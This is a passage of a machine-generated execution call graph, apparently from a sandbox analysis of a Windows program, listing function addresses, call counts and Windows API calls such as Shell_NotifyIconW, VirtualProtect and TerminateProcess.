                                                        execution_graph 94997 cb19cb 95002 c42322 94997->95002 94999 cb19d1 95035 c60f0a 52 API calls __cinit 94999->95035 95001 cb19db 95003 c42344 95002->95003 95036 c426df 95003->95036 95010 c4d7f7 48 API calls 95011 c4238e 95010->95011 95012 c4d7f7 48 API calls 95011->95012 95013 c42398 95012->95013 95014 c4d7f7 48 API calls 95013->95014 95015 c423de 95014->95015 95016 c4d7f7 48 API calls 95015->95016 95017 c424c1 95016->95017 95049 c4263f 95017->95049 95021 c424f1 95022 c4d7f7 48 API calls 95021->95022 95023 c424fb 95022->95023 95078 c42745 95023->95078 95025 c42546 95026 c42556 GetStdHandle 95025->95026 95027 c425b1 95026->95027 95028 cb501d 95026->95028 95029 c425b7 CoInitialize 95027->95029 95028->95027 95030 cb5026 95028->95030 95029->94999 95085 c892d4 53 API calls 95030->95085 95032 cb502d 95086 c899f9 CreateThread 95032->95086 95034 cb5039 CloseHandle 95034->95029 95035->95001 95087 c42854 95036->95087 95040 c4234a 95041 c4272e 95040->95041 95168 c427ec 6 API calls 95041->95168 95043 c4237a 95044 c4d7f7 95043->95044 95045 c5f4ea 48 API calls 95044->95045 95046 c4d818 95045->95046 95047 c5f4ea 48 API calls 95046->95047 95048 c42384 95047->95048 95048->95010 95050 c4d7f7 48 API calls 95049->95050 95051 c4264f 95050->95051 95052 c4d7f7 48 API calls 95051->95052 95053 c42657 95052->95053 95169 c426a7 95053->95169 95056 c426a7 48 API calls 95057 c42667 95056->95057 95058 c4d7f7 48 API calls 95057->95058 95059 c42672 95058->95059 95060 c5f4ea 48 API calls 95059->95060 95061 c424cb 95060->95061 95062 c422a4 95061->95062 95063 c422b2 95062->95063 95064 c4d7f7 48 API calls 95063->95064 95065 c422bd 95064->95065 95066 c4d7f7 48 API calls 95065->95066 95067 c422c8 95066->95067 95068 c4d7f7 48 API calls 95067->95068 95069 c422d3 95068->95069 95070 c4d7f7 48 API calls 95069->95070 95071 c422de 95070->95071 95072 c426a7 48 API calls 95071->95072 95073 c422e9 95072->95073 95074 c5f4ea 48 API calls 95073->95074 95075 c422f0 95074->95075 95076 cb1fe7 95075->95076 95077 c422f9 RegisterWindowMessageW 95075->95077 95077->95021 95079 c42755 95078->95079 95080 cb5f4d 95078->95080 95081 c5f4ea 48 API calls 95079->95081 95174 c8c942 50 API calls 95080->95174 95084 c4275d 95081->95084 95083 cb5f58 95084->95025 95085->95032 95086->95034 95175 c899df 54 API calls 95086->95175 95105 c42870 95087->95105 95090 c42870 48 API calls 95091 c42864 95090->95091 95092 c4d7f7 48 API calls 95091->95092 95093 c42716 95092->95093 95094 c46a63 95093->95094 95095 c46adf 95094->95095 95097 c46a6f __wsetenvp 95094->95097 95125 c4b18b 95095->95125 95098 c46ad7 95097->95098 95099 c46a8b 95097->95099 95124 c4c369 48 API calls 95098->95124 95112 c46b4a 95099->95112 95102 c46a95 95115 c5ee75 95102->95115 95104 c46ab6 ___crtGetEnvironmentStringsW 95104->95040 95106 c4d7f7 48 API calls 95105->95106 95107 c4287b 95106->95107 95108 c4d7f7 48 API calls 95107->95108 95109 c42883 95108->95109 95110 c4d7f7 48 API calls 95109->95110 95111 c4285c 95110->95111 95111->95090 95129 c5f4ea 95112->95129 95114 c46b54 95114->95102 95117 c5f4ea __calloc_impl 95115->95117 95116 c6395c __crtCompareStringA_stat 47 API calls 95116->95117 95117->95116 95118 c5f50c 95117->95118 95119 c5f50e std::exception::exception 95117->95119 95118->95104 95160 c66805 RaiseException 95119->95160 95121 c5f538 95161 c6673b 47 API calls _free 95121->95161 95123 c5f54a 95123->95104 95124->95104 95126 c4b199 95125->95126 95128 c4b1a2 ___crtGetEnvironmentStringsW 95125->95128 95126->95128 95162 c4bdfa 95126->95162 95128->95104 95131 c5f4f2 __calloc_impl 95129->95131 95132 c5f50c 95131->95132 95133 c5f50e std::exception::exception 95131->95133 95138 c6395c 95131->95138 95132->95114 95152 c66805 RaiseException 95133->95152 95135 c5f538 95153 c6673b 47 API calls _free 95135->95153 95137 c5f54a 95137->95114 95139 c639d7 __calloc_impl 95138->95139 95144 c63968 __calloc_impl 95138->95144 95159 c67c0e 47 API calls __getptd_noexit 95139->95159 95142 c6399b RtlAllocateHeap 95142->95144 95151 c639cf 95142->95151 95144->95142 95145 c639c3 95144->95145 95148 c639c1 95144->95148 95149 c63973 95144->95149 95157 c67c0e 47 API calls __getptd_noexit 95145->95157 95158 c67c0e 47 API calls __getptd_noexit 95148->95158 95149->95144 95154 c681c2 47 API calls 2 library calls 95149->95154 95155 c6821f 47 API calls 8 library calls 95149->95155 95156 c61145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95149->95156 95151->95131 95152->95135 95153->95137 95154->95149 95155->95149 95157->95148 95158->95151 95159->95151 95160->95121 95161->95123 95163 c4be0d 95162->95163 95167 c4be0a ___crtGetEnvironmentStringsW 95162->95167 95164 c5f4ea 48 API calls 95163->95164 95165 c4be17 95164->95165 95166 c5ee75 48 API calls 95165->95166 95166->95167 95167->95128 95168->95043 95170 c4d7f7 48 API calls 95169->95170 95171 c426b0 95170->95171 95172 c4d7f7 48 API calls 95171->95172 95173 c4265f 95172->95173 95173->95056 95174->95083 95176 c4ef80 95179 c53b70 95176->95179 95178 c4ef8c 95180 c53bc8 95179->95180 95199 c542a5 95179->95199 95181 c53bef 95180->95181 95183 cb6fd1 95180->95183 95185 cb6f7e 95180->95185 95192 cb6f9b 95180->95192 95182 c5f4ea 48 API calls 95181->95182 95184 c53c18 95182->95184 95274 c9ceca 335 API calls Mailbox 95183->95274 95187 c5f4ea 48 API calls 95184->95187 95185->95181 95188 cb6f87 95185->95188 95226 c53c2c __wsetenvp ___crtGetEnvironmentStringsW 95187->95226 95271 c9d552 335 API calls Mailbox 95188->95271 95189 cb6fbe 95273 c8cc5c 86 API calls 4 library calls 95189->95273 95192->95189 95272 c9da0e 335 API calls 2 library calls 95192->95272 95193 c542f2 95293 c8cc5c 86 API calls 4 library calls 95193->95293 95196 cb73b0 95196->95178 95197 cb7297 95282 c8cc5c 86 API calls 4 library calls 95197->95282 95198 cb737a 95292 c8cc5c 86 API calls 4 library calls 95198->95292 95286 c8cc5c 86 API calls 4 library calls 95199->95286 95204 cb707e 95275 c8cc5c 86 API calls 4 library calls 95204->95275 95206 c540df 95283 c8cc5c 86 API calls 4 library calls 95206->95283 95209 c5dce0 53 API calls 95209->95226 95212 c4d645 53 API calls 95212->95226 95214 cb72d2 95284 c8cc5c 86 API calls 4 library calls 95214->95284 95216 c4fe30 335 API calls 95216->95226 95218 cb7350 95290 c8cc5c 86 API calls 4 library calls 95218->95290 95219 cb72e9 95285 c8cc5c 86 API calls 4 library calls 95219->95285 95220 cb7363 95291 c8cc5c 86 API calls 4 library calls 95220->95291 95224 c46a63 48 API calls 95224->95226 95226->95193 95226->95197 95226->95198 95226->95199 95226->95204 95226->95206 95226->95209 95226->95212 95226->95214 95226->95216 95226->95218 95226->95219 95226->95220 95226->95224 95228 cb714c 95226->95228 95229 c5f4ea 48 API calls 95226->95229 95231 cb733f 95226->95231 95232 c53f2b 95226->95232 95234 c4d286 48 API calls 95226->95234 95238 c5ee75 48 API calls 95226->95238 95239 c46eed 48 API calls 95226->95239 95242 cb71e1 95226->95242 95251 c4d9a0 53 API calls __cinit 95226->95251 95252 c4d83d 53 API calls 95226->95252 95253 c4cdb9 48 API calls 95226->95253 95254 c4d6e9 95226->95254 95258 c5c15c 48 API calls 95226->95258 95259 c5c050 95226->95259 95270 c5becb 335 API calls 95226->95270 95276 c4dcae 50 API calls Mailbox 95226->95276 95277 c9ccdc 48 API calls 95226->95277 95278 c8a1eb 50 API calls 95226->95278 95279 c9ccdc 48 API calls 95228->95279 95229->95226 95289 c8cc5c 86 API calls 4 library calls 95231->95289 95232->95178 95234->95226 95236 cb71a1 95281 c5c15c 48 API calls 95236->95281 95238->95226 95239->95226 95240 cb715f 95240->95236 95280 c9ccdc 48 API calls 95240->95280 95242->95232 95288 c8cc5c 86 API calls 4 library calls 95242->95288 95245 cb71ce 95246 c5c050 48 API calls 95245->95246 95247 cb71d6 95246->95247 95247->95242 95249 cb7313 95247->95249 95248 cb71ab 95248->95199 95248->95245 95287 c8cc5c 86 API calls 4 library calls 95249->95287 95251->95226 95252->95226 95253->95226 95255 c4d6f4 95254->95255 95256 c4d71b 95255->95256 95294 c4d764 55 API calls 95255->95294 95256->95226 95258->95226 95260 c5c064 95259->95260 95262 c5c069 Mailbox 95259->95262 95295 c5c1af 48 API calls 95260->95295 95268 c5c077 95262->95268 95296 c5c15c 48 API calls 95262->95296 95264 c5f4ea 48 API calls 95266 c5c108 95264->95266 95265 c5c152 95265->95226 95267 c5f4ea 48 API calls 95266->95267 95269 c5c113 95267->95269 95268->95264 95268->95265 95269->95226 95269->95269 95270->95226 95271->95232 95272->95189 95273->95183 95274->95226 95275->95232 95276->95226 95277->95226 95278->95226 95279->95240 95280->95240 95281->95248 95282->95206 95283->95232 95284->95219 95285->95232 95286->95232 95287->95232 95288->95232 95289->95232 95290->95232 95291->95232 95292->95232 95293->95196 95294->95256 95295->95262 95296->95268 95297 c43742 95298 c4374b 95297->95298 95299 c437c8 95298->95299 95300 c43769 95298->95300 95338 c437c6 95298->95338 95301 c437ce 95299->95301 95302 cb1e00 95299->95302 95303 c43776 95300->95303 95304 c4382c PostQuitMessage 95300->95304 95306 c437f6 SetTimer RegisterWindowMessageW 95301->95306 95307 c437d3 95301->95307 95352 c42ff6 16 API calls 95302->95352 95309 cb1e88 95303->95309 95310 c43781 95303->95310 95311 c437b9 95304->95311 95305 c437ab DefWindowProcW 95305->95311 95306->95311 95315 c4381f CreatePopupMenu 95306->95315 95312 cb1da3 95307->95312 95313 c437da KillTimer 95307->95313 95367 c84ddd 60 API calls _memset 95309->95367 95316 c43836 95310->95316 95317 c43789 95310->95317 95325 cb1da8 95312->95325 95326 cb1ddc MoveWindow 95312->95326 95349 c43847 Shell_NotifyIconW _memset 95313->95349 95314 cb1e27 95353 c5e312 335 API calls Mailbox 95314->95353 95315->95311 95342 c5eb83 95316->95342 95321 c43794 95317->95321 95322 cb1e6d 95317->95322 95328 c4379f 95321->95328 95329 cb1e58 95321->95329 95322->95305 95366 c7a5f3 48 API calls 95322->95366 95323 cb1e9a 95323->95305 95323->95311 95330 cb1dcb SetFocus 95325->95330 95331 cb1dac 95325->95331 95326->95311 95327 c437ed 95350 c4390f DeleteObject DestroyWindow Mailbox 95327->95350 95328->95305 95354 c43847 Shell_NotifyIconW _memset 95328->95354 95365 c855bd 70 API calls _memset 95329->95365 95330->95311 95331->95328 95332 cb1db5 95331->95332 95351 c42ff6 16 API calls 95332->95351 95337 cb1e68 95337->95311 95338->95305 95340 cb1e4c 95355 c44ffc 95340->95355 95343 c5ec1c 95342->95343 95344 c5eb9a _memset 95342->95344 95343->95311 95368 c451af 95344->95368 95346 c5ec05 KillTimer SetTimer 95346->95343 95347 c5ebc1 95347->95346 95348 cb3c7a Shell_NotifyIconW 95347->95348 95348->95346 95349->95327 95350->95311 95351->95311 95352->95314 95353->95328 95354->95340 95356 c45027 _memset 95355->95356 95444 c44c30 95356->95444 95359 c450ac 95361 cb3d28 Shell_NotifyIconW 95359->95361 95362 c450ca Shell_NotifyIconW 95359->95362 95363 c451af 50 API calls 95362->95363 95364 c450df 95363->95364 95364->95338 95365->95337 95366->95338 95367->95323 95369 c452a2 Mailbox 95368->95369 95370 c451cb 95368->95370 95369->95347 95390 c46b0f 95370->95390 95373 c451e6 95375 c46a63 48 API calls 95373->95375 95374 cb3ca1 LoadStringW 95377 cb3cbb 95374->95377 95376 c451fb 95375->95376 95376->95377 95378 c4520c 95376->95378 95379 c4510d 48 API calls 95377->95379 95380 c45216 95378->95380 95381 c452a7 95378->95381 95384 cb3cc5 95379->95384 95395 c4510d 95380->95395 95404 c46eed 95381->95404 95387 c45220 _memset _wcscpy 95384->95387 95408 c4518c 95384->95408 95386 cb3ce7 95389 c4518c 48 API calls 95386->95389 95388 c45288 Shell_NotifyIconW 95387->95388 95388->95369 95389->95387 95391 c5f4ea 48 API calls 95390->95391 95392 c46b34 95391->95392 95393 c46b4a 48 API calls 95392->95393 95394 c451d9 95393->95394 95394->95373 95394->95374 95396 c4511f 95395->95396 95397 cb1be7 95395->95397 95418 c4b384 95396->95418 95427 c7a58f 48 API calls ___crtGetEnvironmentStringsW 95397->95427 95400 cb1bf1 95402 c46eed 48 API calls 95400->95402 95401 c4512b 95401->95387 95403 cb1bf9 Mailbox 95402->95403 95405 c46f00 95404->95405 95406 c46ef8 95404->95406 95405->95387 95433 c4dd47 48 API calls ___crtGetEnvironmentStringsW 95406->95433 95409 c45197 95408->95409 95410 cb1ace 95409->95410 95411 c4519f 95409->95411 95413 c46b4a 48 API calls 95410->95413 95434 c45130 95411->95434 95415 cb1adb __wsetenvp 95413->95415 95414 c451aa 95414->95386 95416 c5ee75 48 API calls 95415->95416 95417 cb1b07 ___crtGetEnvironmentStringsW 95416->95417 95419 c4b392 95418->95419 95420 c4b3c5 ___crtGetEnvironmentStringsW 95418->95420 95419->95420 95421 c4b3fd 95419->95421 95422 c4b3b8 95419->95422 95420->95401 95420->95420 95424 c5f4ea 48 API calls 95421->95424 95428 c4bb85 95422->95428 95425 c4b407 95424->95425 95426 c5f4ea 48 API calls 95425->95426 95426->95420 95427->95400 95429 c4bb9b 95428->95429 95432 c4bb96 ___crtGetEnvironmentStringsW 95428->95432 95430 c5ee75 48 API calls 95429->95430 95431 cb1b77 95429->95431 95430->95432 95432->95420 95433->95405 95435 c4513f __wsetenvp 95434->95435 95436 c45151 95435->95436 95437 cb1b27 95435->95437 95439 c4bb85 48 API calls 95436->95439 95438 c46b4a 48 API calls 95437->95438 95440 cb1b34 95438->95440 95441 c4515e ___crtGetEnvironmentStringsW 95439->95441 95442 c5ee75 48 API calls 95440->95442 95441->95414 95443 cb1b57 ___crtGetEnvironmentStringsW 95442->95443 95445 c44c44 95444->95445 95446 cb3c33 95444->95446 95445->95359 95448 c85819 61 API calls _W_store_winword 95445->95448 95446->95445 95447 cb3c3c DestroyIcon 95446->95447 95447->95445 95448->95359 95449 cb9bec 95483 c50ae0 Mailbox ___crtGetEnvironmentStringsW 95449->95483 95453 c5f4ea 48 API calls 95475 c4fec8 95453->95475 95454 c5146e 95462 c46eed 48 API calls 95454->95462 95456 c50509 95628 c8cc5c 86 API calls 4 library calls 95456->95628 95458 c51473 95627 c8cc5c 86 API calls 4 library calls 95458->95627 95460 cba246 95467 c46eed 48 API calls 95460->95467 95478 c4ffe1 Mailbox 95462->95478 95463 cba922 95465 c46eed 48 API calls 95465->95475 95467->95478 95468 c797ed InterlockedDecrement 95468->95475 95469 cba873 95470 c4d7f7 48 API calls 95470->95475 95471 cba30e 95471->95478 95623 c797ed InterlockedDecrement 95471->95623 95472 c60f0a 52 API calls __cinit 95472->95475 95475->95453 95475->95454 95475->95456 95475->95458 95475->95460 95475->95465 95475->95468 95475->95470 95475->95471 95475->95472 95476 cba973 95475->95476 95475->95478 95480 c515b5 95475->95480 95620 c51820 335 API calls 2 library calls 95475->95620 95621 c51d10 59 API calls Mailbox 95475->95621 95629 c8cc5c 86 API calls 4 library calls 95476->95629 95479 cba982 95626 c8cc5c 86 API calls 4 library calls 95480->95626 95483->95475 95483->95478 95484 cba706 95483->95484 95486 c51526 Mailbox 95483->95486 95487 c5f4ea 48 API calls 95483->95487 95488 c797ed InterlockedDecrement 95483->95488 95492 c4fe30 95483->95492 95521 ca0d09 95483->95521 95524 ca0d1d 95483->95524 95527 c96ff0 95483->95527 95536 c9f0ac 95483->95536 95568 c8a6ef 95483->95568 95574 c4ce19 95483->95574 95580 c9e822 95483->95580 95622 c9ef61 82 API calls 2 library calls 95483->95622 95624 c8cc5c 86 API calls 4 library calls 95484->95624 95625 c8cc5c 86 API calls 4 library calls 95486->95625 95487->95483 95488->95483 95493 c4fe50 95492->95493 95514 c4fe7e 95492->95514 95494 c5f4ea 48 API calls 95493->95494 95494->95514 95495 c60f0a 52 API calls __cinit 95495->95514 95496 c5146e 95497 c46eed 48 API calls 95496->95497 95505 c4ffe1 95497->95505 95498 c515b5 95633 c8cc5c 86 API calls 4 library calls 95498->95633 95499 c4d7f7 48 API calls 95499->95514 95501 c5f4ea 48 API calls 95501->95514 95503 c50509 95635 c8cc5c 86 API calls 4 library calls 95503->95635 95505->95483 95506 c51473 95634 c8cc5c 86 API calls 4 library calls 95506->95634 95507 cba246 95510 c46eed 48 API calls 95507->95510 95508 cba922 95508->95483 95510->95505 95512 c46eed 48 API calls 95512->95514 95513 cba873 95513->95483 95514->95495 95514->95496 95514->95498 95514->95499 95514->95501 95514->95503 95514->95505 95514->95506 95514->95507 95514->95512 95515 cba30e 95514->95515 95516 c797ed InterlockedDecrement 95514->95516 95518 cba973 95514->95518 95630 c51820 335 API calls 2 library calls 95514->95630 95631 c51d10 59 API calls Mailbox 95514->95631 95515->95505 95632 c797ed InterlockedDecrement 95515->95632 95516->95514 95636 c8cc5c 86 API calls 4 library calls 95518->95636 95520 cba982 95637 c9f8ae 95521->95637 95523 ca0d19 95523->95483 95525 c9f8ae 129 API calls 95524->95525 95526 ca0d2d 95525->95526 95526->95483 95528 c4936c 81 API calls 95527->95528 95529 c9702a 95528->95529 95785 c4b470 95529->95785 95531 c9703a 95532 c9705f 95531->95532 95533 c4fe30 335 API calls 95531->95533 95535 c97063 95532->95535 95813 c4cdb9 48 API calls 95532->95813 95533->95532 95535->95483 95537 c4d7f7 48 API calls 95536->95537 95538 c9f0c0 95537->95538 95539 c4d7f7 48 API calls 95538->95539 95540 c9f0c8 95539->95540 95541 c4d7f7 48 API calls 95540->95541 95542 c9f0d0 95541->95542 95543 c4936c 81 API calls 95542->95543 95567 c9f0de 95543->95567 95544 c9f2f9 Mailbox 95544->95483 95545 c4c799 48 API calls 95545->95567 95546 c46a63 48 API calls 95546->95567 95547 c9f2cc 95547->95544 95841 c46b68 48 API calls 95547->95841 95549 c9f2b3 95550 c4518c 48 API calls 95549->95550 95553 c9f2c0 95550->95553 95551 c9f2ce 95554 c4518c 48 API calls 95551->95554 95552 c46eed 48 API calls 95552->95567 95555 c4510d 48 API calls 95553->95555 95556 c9f2dd 95554->95556 95555->95547 95559 c4510d 48 API calls 95556->95559 95557 c4bdfa 48 API calls 95558 c9f175 CharUpperBuffW 95557->95558 95830 c4d645 95558->95830 95559->95547 95560 c4bdfa 48 API calls 95562 c9f23a CharUpperBuffW 95560->95562 95840 c5d922 55 API calls 2 library calls 95562->95840 95564 c4936c 81 API calls 95564->95567 95565 c4518c 48 API calls 95565->95567 95566 c4510d 48 API calls 95566->95567 95567->95544 95567->95545 95567->95546 95567->95547 95567->95549 95567->95551 95567->95552 95567->95557 95567->95560 95567->95564 95567->95565 95567->95566 95569 c8a6fb 95568->95569 95570 c5f4ea 48 API calls 95569->95570 95571 c8a709 95570->95571 95572 c4d7f7 48 API calls 95571->95572 95573 c8a717 95571->95573 95572->95573 95573->95483 95575 c4ce28 __wsetenvp 95574->95575 95576 c5ee75 48 API calls 95575->95576 95577 c4ce50 ___crtGetEnvironmentStringsW 95576->95577 95578 c5f4ea 48 API calls 95577->95578 95579 c4ce66 95578->95579 95579->95483 95581 c9e868 95580->95581 95582 c9e84e 95580->95582 95846 c9ccdc 48 API calls 95581->95846 95845 c8cc5c 86 API calls 4 library calls 95582->95845 95585 c9e871 95586 c4fe30 334 API calls 95585->95586 95587 c9e8cf 95586->95587 95588 c9e96a 95587->95588 95589 c9e916 95587->95589 95613 c9e860 Mailbox 95587->95613 95590 c9e978 95588->95590 95594 c9e9c7 95588->95594 95847 c89b72 48 API calls 95589->95847 95865 c8a69d 48 API calls 95590->95865 95593 c9e949 95848 c545e0 95593->95848 95597 c4936c 81 API calls 95594->95597 95594->95613 95595 c9e99b 95866 c4bc74 48 API calls 95595->95866 95599 c9e9e1 95597->95599 95601 c4bdfa 48 API calls 95599->95601 95600 c9e9a3 Mailbox 95867 c53200 95600->95867 95602 c9ea05 CharUpperBuffW 95601->95602 95603 c9ea1f 95602->95603 95605 c9ea72 95603->95605 95606 c9ea26 95603->95606 95607 c4936c 81 API calls 95605->95607 95939 c89b72 48 API calls 95606->95939 95608 c9ea7a 95607->95608 95940 c41caa 49 API calls 95608->95940 95611 c9ea54 95612 c545e0 334 API calls 95611->95612 95612->95613 95613->95483 95614 c9ea84 95614->95613 95615 c4936c 81 API calls 95614->95615 95616 c9ea9f 95615->95616 95941 c4bc74 48 API calls 95616->95941 95618 c9eaaf 95619 c53200 334 API calls 95618->95619 95619->95613 95620->95475 95621->95475 95622->95483 95623->95478 95624->95486 95625->95478 95626->95478 95627->95469 95628->95463 95629->95479 95630->95514 95631->95514 95632->95505 95633->95505 95634->95513 95635->95508 95636->95520 95673 c4936c 95637->95673 95639 c9f8ea 95661 c9f92c Mailbox 95639->95661 95693 ca0567 95639->95693 95641 c9fb8b 95642 c9fcfa 95641->95642 95647 c9fb95 95641->95647 95757 ca0688 89 API calls Mailbox 95642->95757 95645 c9fd07 95646 c9fd13 95645->95646 95645->95647 95646->95661 95706 c9f70a 95647->95706 95648 c4936c 81 API calls 95667 c9f984 Mailbox 95648->95667 95653 c9fbc9 95720 c5ed18 95653->95720 95656 c9fbfd 95659 c5c050 48 API calls 95656->95659 95657 c9fbe3 95755 c8cc5c 86 API calls 4 library calls 95657->95755 95662 c9fc14 95659->95662 95660 c9fbee GetCurrentProcess TerminateProcess 95660->95656 95661->95523 95663 c51b90 48 API calls 95662->95663 95672 c9fc3e 95662->95672 95665 c9fc2d 95663->95665 95664 c9fd65 95664->95661 95669 c9fd7e FreeLibrary 95664->95669 95668 ca040f 105 API calls 95665->95668 95667->95641 95667->95648 95667->95661 95667->95667 95753 ca29e8 48 API calls ___crtGetEnvironmentStringsW 95667->95753 95754 c9fda5 60 API calls 2 library calls 95667->95754 95668->95672 95669->95661 95672->95664 95724 c51b90 95672->95724 95740 ca040f 95672->95740 95756 c4dcae 50 API calls Mailbox 95672->95756 95674 c49384 95673->95674 95691 c49380 95673->95691 95675 cb4cbd __i64tow 95674->95675 95676 cb4bbf 95674->95676 95677 c49398 95674->95677 95685 c493b0 __itow Mailbox _wcscpy 95674->95685 95678 cb4bc8 95676->95678 95679 cb4ca5 95676->95679 95758 c6172b 80 API calls 3 library calls 95677->95758 95684 cb4be7 95678->95684 95678->95685 95759 c6172b 80 API calls 3 library calls 95679->95759 95682 c5f4ea 48 API calls 95683 c493ba 95682->95683 95686 c4ce19 48 API calls 95683->95686 95683->95691 95687 c5f4ea 48 API calls 95684->95687 95685->95682 95686->95691 95688 cb4c04 95687->95688 95689 c5f4ea 48 API calls 95688->95689 95690 cb4c2a 95689->95690 95690->95691 95692 c4ce19 48 API calls 95690->95692 95691->95639 95692->95691 95694 c4bdfa 48 API calls 95693->95694 95695 ca0582 CharLowerBuffW 95694->95695 95760 c81f11 95695->95760 95699 c4d7f7 48 API calls 95700 ca05bb 95699->95700 95767 c469e9 48 API calls ___crtGetEnvironmentStringsW 95700->95767 95702 ca05d2 95703 c4b18b 48 API calls 95702->95703 95704 ca05de Mailbox 95703->95704 95705 ca061a Mailbox 95704->95705 95768 c9fda5 60 API calls 2 library calls 95704->95768 95705->95667 95707 c9f725 95706->95707 95711 c9f77a 95706->95711 95708 c5f4ea 48 API calls 95707->95708 95710 c9f747 95708->95710 95709 c5f4ea 48 API calls 95709->95710 95710->95709 95710->95711 95712 ca0828 95711->95712 95713 ca0a53 Mailbox 95712->95713 95719 ca084b _strcat _wcscpy __wsetenvp 95712->95719 95713->95653 95714 c4cf93 58 API calls 95714->95719 95715 c4d286 48 API calls 95715->95719 95716 c4936c 81 API calls 95716->95719 95717 c6395c 47 API calls __crtCompareStringA_stat 95717->95719 95719->95713 95719->95714 95719->95715 95719->95716 95719->95717 95771 c88035 50 API calls __wsetenvp 95719->95771 95722 c5ed2d 95720->95722 95721 c5edc5 VirtualProtect 95723 c5ed93 95721->95723 95722->95721 95722->95723 95723->95656 95723->95657 95725 c51cf6 95724->95725 95728 c51ba2 95724->95728 95725->95672 95727 c51c5d 95727->95672 95730 c5f4ea 48 API calls 95728->95730 95738 c51bae 95728->95738 95729 c51bb9 95729->95727 95733 c5f4ea 48 API calls 95729->95733 95731 cb49c4 95730->95731 95732 c5f4ea 48 API calls 95731->95732 95739 cb49cf 95732->95739 95734 c51c9f 95733->95734 95735 c51cb2 95734->95735 95772 c42925 48 API calls 95734->95772 95735->95672 95737 c5f4ea 48 API calls 95737->95739 95738->95729 95773 c5c15c 48 API calls 95738->95773 95739->95737 95739->95738 95741 ca0427 95740->95741 95750 ca0443 95740->95750 95742 ca04f8 95741->95742 95743 ca042e 95741->95743 95744 ca044f 95741->95744 95741->95750 95783 c89dc5 103 API calls 95742->95783 95780 c87c56 50 API calls _strlen 95743->95780 95782 c4cdb9 48 API calls 95744->95782 95745 ca051e 95745->95672 95750->95745 95774 c61c9d 95750->95774 95751 ca0438 95781 c4cdb9 48 API calls 95751->95781 95753->95667 95754->95667 95755->95660 95756->95672 95757->95645 95758->95685 95759->95685 95761 c81f3b __wsetenvp 95760->95761 95762 c81ffa 95761->95762 95763 c81f6f 95761->95763 95764 c81f79 95761->95764 95762->95764 95770 c5d37a 60 API calls 95762->95770 95763->95764 95769 c5d37a 60 API calls 95763->95769 95764->95699 95764->95704 95767->95702 95768->95705 95769->95763 95770->95762 95771->95719 95772->95735 95773->95729 95775 c61ca6 RtlFreeHeap 95774->95775 95779 c61ccf _free 95774->95779 95776 c61cbb 95775->95776 95775->95779 95784 c67c0e 47 API calls __getptd_noexit 95776->95784 95778 c61cc1 GetLastError 95778->95779 95779->95745 95780->95751 95781->95750 95782->95750 95783->95750 95784->95778 95786 c46b0f 48 API calls 95785->95786 95806 c4b495 95786->95806 95787 c4b69b 95816 c4ba85 48 API calls ___crtGetEnvironmentStringsW 95787->95816 95789 c4b6b5 Mailbox 95789->95531 95792 cb397b 95827 c826bc 88 API calls 4 library calls 95792->95827 95795 c4b9e4 95829 c826bc 88 API calls 4 library calls 95795->95829 95796 c4ba85 48 API calls 95796->95806 95797 cb3973 95797->95789 95800 cb3989 95828 c4ba85 48 API calls ___crtGetEnvironmentStringsW 95800->95828 95801 c4bcce 48 API calls 95801->95806 95803 cb3909 95805 c46b4a 48 API calls 95803->95805 95804 c4bb85 48 API calls 95804->95806 95808 cb3914 95805->95808 95806->95787 95806->95792 95806->95795 95806->95796 95806->95801 95806->95803 95806->95804 95809 c4bdfa 48 API calls 95806->95809 95812 cb3939 ___crtGetEnvironmentStringsW 95806->95812 95814 c4c413 59 API calls 95806->95814 95815 c4bc74 48 API calls 95806->95815 95817 c4c6a5 49 API calls 95806->95817 95818 c4c799 95806->95818 95811 c5f4ea 48 API calls 95808->95811 95810 c4b66c CharUpperBuffW 95809->95810 95810->95806 95811->95812 95826 c826bc 88 API calls 4 library calls 95812->95826 95813->95535 95814->95806 95815->95806 95816->95789 95817->95806 95819 cb1f17 95818->95819 95821 c4c7b0 95818->95821 95820 c46b4a 48 API calls 95819->95820 95822 cb1f21 95820->95822 95824 c5ee75 48 API calls 95821->95824 95825 c4c7bd ___crtGetEnvironmentStringsW 95821->95825 95823 c5f4ea 48 API calls 95822->95823 95823->95825 95824->95825 95825->95806 95825->95825 95826->95797 95827->95800 95828->95797 95829->95797 95831 c4d654 95830->95831 95839 c4d67e 95830->95839 95832 c4d6c2 95831->95832 95833 c4d65b 95831->95833 95834 c4d6ab 95832->95834 95844 c5dce0 53 API calls 95832->95844 95833->95834 95836 c4d666 95833->95836 95834->95839 95843 c5dce0 53 API calls 95834->95843 95842 c4d9a0 53 API calls __cinit 95836->95842 95839->95567 95840->95567 95841->95544 95842->95839 95843->95839 95844->95834 95845->95613 95846->95585 95847->95593 95849 c54637 95848->95849 95850 c5479f 95848->95850 95851 c54643 95849->95851 95852 cb6e05 95849->95852 95853 c4ce19 48 API calls 95850->95853 95992 c54300 335 API calls ___crtGetEnvironmentStringsW 95851->95992 95855 c9e822 335 API calls 95852->95855 95860 c546e4 Mailbox 95853->95860 95856 cb6e11 95855->95856 95858 c54739 Mailbox 95856->95858 95993 c8cc5c 86 API calls 4 library calls 95856->95993 95858->95613 95859 c54659 95859->95856 95859->95858 95859->95860 95863 c96ff0 335 API calls 95860->95863 95942 c8fa0c 95860->95942 95983 c44252 95860->95983 95989 c86524 95860->95989 95863->95858 95865->95595 95866->95600 96758 c4bd30 95867->96758 95869 c53267 95871 cb907a 95869->95871 95872 c532f8 95869->95872 95930 c53628 95869->95930 96837 c8cc5c 86 API calls 4 library calls 95871->96837 96831 c5c36b 86 API calls 95872->96831 95876 cb91fa 96842 c8cc5c 86 API calls 4 library calls 95876->96842 95877 c53313 95927 c534eb Mailbox ___crtGetEnvironmentStringsW 95877->95927 95877->95930 95933 cb94df 95877->95933 96763 c42b7a 95877->96763 95881 cb93c5 95884 c4fe30 335 API calls 95881->95884 95882 cb926d 96846 c8cc5c 86 API calls 4 library calls 95882->96846 95883 cb909a 95883->95876 95885 c4d645 53 API calls 95883->95885 95887 cb9407 95884->95887 95888 cb910c 95885->95888 95897 c4d6e9 55 API calls 95887->95897 95887->95930 95891 cb9220 95888->95891 95892 cb9114 95888->95892 95889 c533ce 95894 c53465 95889->95894 95895 cb945e 95889->95895 95889->95927 96843 c41caa 49 API calls 95891->96843 95904 cb9128 95892->95904 95913 cb9152 95892->95913 95900 c5f4ea 48 API calls 95894->95900 96852 c8c942 50 API calls 95895->96852 95901 cb9438 95897->95901 95916 c5346c 95900->95916 96851 c8cc5c 86 API calls 4 library calls 95901->96851 95902 cb923d 95906 cb925e 95902->95906 95907 cb9252 95902->95907 95903 